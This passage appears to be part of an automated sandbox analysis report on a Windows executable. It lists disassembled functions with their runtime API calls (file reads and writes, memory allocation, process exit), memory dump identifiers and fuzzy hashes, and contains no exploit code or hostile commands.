              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessagePeekSleepTimetime
              • String ID:
              • API String ID: 1792118007-0
              • Opcode ID: 9436d4ed7ddc58bd32829fd97325245f38a882a7f2b7cba52e07ec9683341759
              • Instruction ID: 34aecc6d27edf4bccfcb82993aca07a66d958201808cd971ede5f360a801e060
              • Opcode Fuzzy Hash: 9436d4ed7ddc58bd32829fd97325245f38a882a7f2b7cba52e07ec9683341759
              • Instruction Fuzzy Hash: FFF058312402029FE754EB69D849BA6BBE8AB95351F10412DE86EC7240DB74A800DB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA15A2, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
              Download Yara Rule
              APIs
              • ___crtCorExitProcess.LIBCMT ref: 00FA15AA
                • Part of subcall function 00FA1577: GetModuleHandleW.KERNEL32(mscoree.dll,?,00FA15AF,?,?,00FA350A,000000FF,0000001E,00000001,00000000,00000000,?,00FA6A35,?,00000001,?), ref: 00FA1581
                • Part of subcall function 00FA1577: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FA1591
              • ExitProcess.KERNEL32 ref: 00FA15B3
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ExitProcess$AddressHandleModuleProc___crt
              • String ID:
              • API String ID: 2427264223-0
              • Opcode ID: 3c639ef0e91e5ea44fb94d73afa8790d2c9d3c98449d20f99fc9abd67d10cb8d
              • Instruction ID: a90827a4e351502c351bce4cf9456b469eb5749373df1a6f3c51dc8f1b4d0ee8
              • Opcode Fuzzy Hash: 3c639ef0e91e5ea44fb94d73afa8790d2c9d3c98449d20f99fc9abd67d10cb8d
              • Instruction Fuzzy Hash: E4B09231400148BFCB152F12EC0E84D3F2AFB823A0B258024F95909031DF7AAE92AA80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F93D20, Relevance: 2.6, APIs: 2, Instructions: 53COMMON
              Download Yara Rule
              APIs
              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00F9378C,?,?,?,00000010), ref: 00F93D38
                • Part of subcall function 00FA14F7: _malloc.LIBCMT ref: 00FA1511
              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00F93D71
                • Part of subcall function 00F93DA0: _memmove.LIBCMT ref: 00F93DD7
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ByteCharMultiWide$_malloc_memmove
              • String ID:
              • API String ID: 961785871-0
              • Opcode ID: 7135a985f1df50ab764668bc8c720ac1d634150c24047f1f41e07cc764100b5d
              • Instruction ID: 897829c6ef7c5f1c942dce7683cf9232052ed30cfcc46de54c7f291812b274e1
              • Opcode Fuzzy Hash: 7135a985f1df50ab764668bc8c720ac1d634150c24047f1f41e07cc764100b5d
              • Instruction Fuzzy Hash: BA01D1723442047FEB54AA68DC86F6B779CEB89B20F144029FA0ADB2C0D9A5ED008761
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9B650, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3cd6f46e1e790a714e81f58833fa7c686fc7db130a68d51d701ba246dd7711a6
              • Instruction ID: 3628a76c492dcc636649fe1b3dab78b09a5e3ec8a4a45af344df62dbebf01f29
              • Opcode Fuzzy Hash: 3cd6f46e1e790a714e81f58833fa7c686fc7db130a68d51d701ba246dd7711a6
              • Instruction Fuzzy Hash: 4B31C9B5D04200DBEF20DF69DE86F2673A8BF41750F298559E50587211D739F844FBA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F93130, Relevance: 1.6, APIs: 1, Instructions: 104COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _memmove
              • String ID:
              • API String ID: 4104443479-0
              • Opcode ID: bdc44aa8d1b507d217a873936faf27a8d940132a176b08400c5b64236a8bda66
              • Instruction ID: bb2822746e209d91686029f00aa5069b5ee98b5525c488956143122372efae8d
              • Opcode Fuzzy Hash: bdc44aa8d1b507d217a873936faf27a8d940132a176b08400c5b64236a8bda66
              • Instruction Fuzzy Hash: DD318F71E04208EBEF148F96D9426AEFBF4FF40700F2085AAD895D6650E73DDA90EB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F929B0, Relevance: 1.6, APIs: 1, Instructions: 101COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _memmove
              • String ID:
              • API String ID: 4104443479-0
              • Opcode ID: b8741718d52c5cf7e94262619e18a7adffeed8158fa48cebfbe0033c2aa22fc1
              • Instruction ID: e4a83c279b6aa07b22d915dfbd2a126685c3781ba51346aa9c67b8f8e1900ffe
              • Opcode Fuzzy Hash: b8741718d52c5cf7e94262619e18a7adffeed8158fa48cebfbe0033c2aa22fc1
              • Instruction Fuzzy Hash: BA319CBA600612EFDB54DF18C880A61F3E0FF0A710B14C569D989CB755E735E852EBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F931B0, Relevance: 1.6, APIs: 1, Instructions: 95COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _memmove
              • String ID:
              • API String ID: 4104443479-0
              • Opcode ID: d1cbc9fa96a96fc74ec28b112562c8085a5ab41b2cc22333d2bcb756cd60bbee
              • Instruction ID: efb90e4b7b9923e0faa00955d2199e6c46377be3d914be3d9c2c63d655f895e0
              • Opcode Fuzzy Hash: d1cbc9fa96a96fc74ec28b112562c8085a5ab41b2cc22333d2bcb756cd60bbee
              • Instruction Fuzzy Hash: 28317070A042059FDB24EF68C88196AB3F5FF58304B24845DE4968B352EB36EE51DB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9E1B0, Relevance: 1.6, APIs: 1, Instructions: 94COMMON
              Download Yara Rule
              APIs
              • SetFilePointerEx.KERNELBASE(?,?,00002000,00000000,?,?,00002000), ref: 00F9E248
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: 0c7c6f9a0cecbc79e104bba6cc1c2b0709ddbd2884e9eb64ceb2822170b1d1c4
              • Instruction ID: 5761691474b1e53b42d384e6de3eee5b82fec26258cc9f11052a213b8c761db0
              • Opcode Fuzzy Hash: 0c7c6f9a0cecbc79e104bba6cc1c2b0709ddbd2884e9eb64ceb2822170b1d1c4
              • Instruction Fuzzy Hash: D9312B71E007059FEF28CF6DD884A5AB7FAFB88720B14CA2EE45A87700D635F9459B50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA0C1C, Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
              • Instruction ID: 500b61ff1d2ce7972f3e93d171a30b75c9f2a6933215f6b5e48339d2bbf631de
              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
              • Instruction Fuzzy Hash: B331D3B1A00109DBC718DF58E490A69F7A6FF4A320B2487A5E40ACB251DB31EDC1EB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F99190, Relevance: 1.6, APIs: 1, Instructions: 71COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c0fab9cf78a37c759479e79969830755cbc9e5423c273578deb424dbcec5686d
              • Instruction ID: 1fa00f06874e8437a4b79500ea063f9dfd0763403d9f8102a62ee31ac640a1a4
              • Opcode Fuzzy Hash: c0fab9cf78a37c759479e79969830755cbc9e5423c273578deb424dbcec5686d
              • Instruction Fuzzy Hash: EE1193B5908202CBEA34DF1DCC8AA2573A4BF42710B3A880EE44587214D779E8D0FB51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F93B40, Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON
              Download Yara Rule
              APIs
              • ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,?), ref: 00F93B92
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: a0ea9f0bb173527694088900ce97e90ecf18a54e0880fe335945868a19567393
              • Instruction ID: 1d535ace1dfacb0838c182c397f0a3c90f0b574f06a322d4e459fc932d34daf9
              • Opcode Fuzzy Hash: a0ea9f0bb173527694088900ce97e90ecf18a54e0880fe335945868a19567393
              • Instruction Fuzzy Hash: C5114871600B019FEB30CF15C890B27B7F8EB80750F10891EE59A87A50D775FA45DBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FAF597, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
              Download Yara Rule
              APIs
              • RtlAllocateHeap.NTDLL(00000008,00FA12DC,00000000,?,00FA6A7F,?,00FA12DC,00000000,00000000,00000000,?,00FA793E,00000001,00000214,?,00FA12DC), ref: 00FAF5DA
                • Part of subcall function 00FA7E9A: __getptd_noexit.LIBCMT ref: 00FA7E9A
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AllocateHeap__getptd_noexit
              • String ID:
              • API String ID: 328603210-0
              • Opcode ID: f9bd81f05c9f7073c39832347d172ae68da19151c7c0d6e00521f0119a32f383
              • Instruction ID: a28b33acafb5e4bc0ec26b36a26716fb622ac13dc7fd1875c261a2fb6c2e2b6f
              • Opcode Fuzzy Hash: f9bd81f05c9f7073c39832347d172ae68da19151c7c0d6e00521f0119a32f383
              • Instruction Fuzzy Hash: B601F1B6A002159FEB349EA1DC54B673798AF83730F198539E8168F290E735CC04E750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F93250, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _memmove
              • String ID:
              • API String ID: 4104443479-0
              • Opcode ID: 192246888b51903bc7e7d3f42644df5ad16b10994b71dcc2497401b48d673cf5
              • Instruction ID: e40e31cd2f33b8d38a83d168198bca4fe69b518df6df61ce1f7494e0d4f21fd2
              • Opcode Fuzzy Hash: 192246888b51903bc7e7d3f42644df5ad16b10994b71dcc2497401b48d673cf5
              • Instruction Fuzzy Hash: DF015A716006009FD328EF6CD942D27B3E5EF99744714886DE49AC7762EB36E802DB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FE30A7, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00FA14F7: _malloc.LIBCMT ref: 00FA1511
                • Part of subcall function 00FA14F7: std::exception::exception.LIBCMT ref: 00FA1546
                • Part of subcall function 00FA14F7: std::exception::exception.LIBCMT ref: 00FA1560
                • Part of subcall function 00FA14F7: __CxxThrowException@8.LIBCMT ref: 00FA1571
              • _memset.LIBCMT ref: 00FE30E3
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: std::exception::exception$Exception@8Throw_malloc_memset
              • String ID:
              • API String ID: 1169493612-0
              • Opcode ID: b17a19bfa6e022758fe658764bb2bc4b4a8effc45995baaa177408ecd83d95d0
              • Instruction ID: 0a8fc044f4049d811c359e13d8400d7928cee149e0fa31c8e7d3af65777a7544
              • Opcode Fuzzy Hash: b17a19bfa6e022758fe658764bb2bc4b4a8effc45995baaa177408ecd83d95d0
              • Instruction Fuzzy Hash: 7C11E2B52002409FD310EF5CD881E52BBA5FF9A714F258569E6898B352D676E801DBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FFFD26, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _wcscpy
              • String ID:
              • API String ID: 3048848545-0
              • Opcode ID: c268edffd11c4cbb4d224b8625af7d214eeeb5606354a08f8d4cf2e0546bcfa6
              • Instruction ID: c59517e9e14c6dd2cf185a79db2c330299703d07c5d9efe7db67d60bb2697810
              • Opcode Fuzzy Hash: c268edffd11c4cbb4d224b8625af7d214eeeb5606354a08f8d4cf2e0546bcfa6
              • Instruction Fuzzy Hash: B1F05C73514218365A10AB65AC42CEBB35CEF97330700022BFA5497181E5227445A3F0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F92920, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _memmove
              • String ID:
              • API String ID: 4104443479-0
              • Opcode ID: cb3ca9f3a284803d6831156f6c6df155b68c64cec4ad1ac307353cd51ddd65df
              • Instruction ID: 7fb63482376c86c3e68046e9a591ac5f2236eae8296cb8037fc1d77b876254cc
              • Opcode Fuzzy Hash: cb3ca9f3a284803d6831156f6c6df155b68c64cec4ad1ac307353cd51ddd65df
              • Instruction Fuzzy Hash: D1F082712001005FD759EB2CE846D7773E8EBC9714715846DF09AC7315DB39EC419BA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9ECD0, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00FA14F7: _malloc.LIBCMT ref: 00FA1511
              • CharUpperBuffW.USER32(?,?), ref: 00F9ED03
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: BuffCharUpper_malloc
              • String ID:
              • API String ID: 1573836695-0
              • Opcode ID: 8bceec89ead9c46c5b432a97e9f1f5ec968b9e10a7ad6b1e1d0e792346651a9a
              • Instruction ID: 92dee123466e3d910fac95b82f88b95a88b46ea0487bc2e1f5a83cd5599edec6
              • Opcode Fuzzy Hash: 8bceec89ead9c46c5b432a97e9f1f5ec968b9e10a7ad6b1e1d0e792346651a9a
              • Instruction Fuzzy Hash: CFF012706006208FEF21AF54E945726B7A4EF09B51F04855AFC898F346C738DC01DBE1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9D9C0, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
              Download Yara Rule
              APIs
              • FindCloseChangeNotification.KERNELBASE(?,?,00FB6F2F), ref: 00F9D9DD
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              • Opcode ID: 1634b5813c36a4ad04fc53c8a260e138e3bc5cd7eff6835b9a2c5ad773f5d12b
              • Instruction ID: 6870ef70acf4f8e5591f05e684cd2d8ae80bc15b613b32ea59c60ed82f93f136
              • Opcode Fuzzy Hash: 1634b5813c36a4ad04fc53c8a260e138e3bc5cd7eff6835b9a2c5ad773f5d12b
              • Instruction Fuzzy Hash: 65E04EB4900B009A87308F2AE444406FBF8AFE02213208E1FE4E6C2A64C3B4A1898F50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FD3D3A, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
              Download Yara Rule
              APIs
              • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,00FB6340,?,01017AAC,00000003,00F9E0B0,?,?,00000001), ref: 00FD3D58
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              • Opcode ID: 654f3b2d61ac201d0644b41ddeef340acc5c0f5afe8d6d5cc725faa379a715bd
              • Instruction ID: 1593a6472c2e8c053b41aa612c0cf2e7425335128364d432d5c38efc84e13c7b
              • Opcode Fuzzy Hash: 654f3b2d61ac201d0644b41ddeef340acc5c0f5afe8d6d5cc725faa379a715bd
              • Instruction Fuzzy Hash: 03E01276100318AFCB20DF98D844FDA77BDEF48760F10850AFA448B200C7B8EA808BE1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9E270, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
              Download Yara Rule
              APIs
              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 00F9E288
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: 3307c12e21a02b209a832c1e1595ae4c26b2041413e96cbddd14025b46676f1a
              • Instruction ID: dfc2895e5f1fbae38997dcc6a148890e610d9b0b4dd45511edcb2afe9d82e8b5
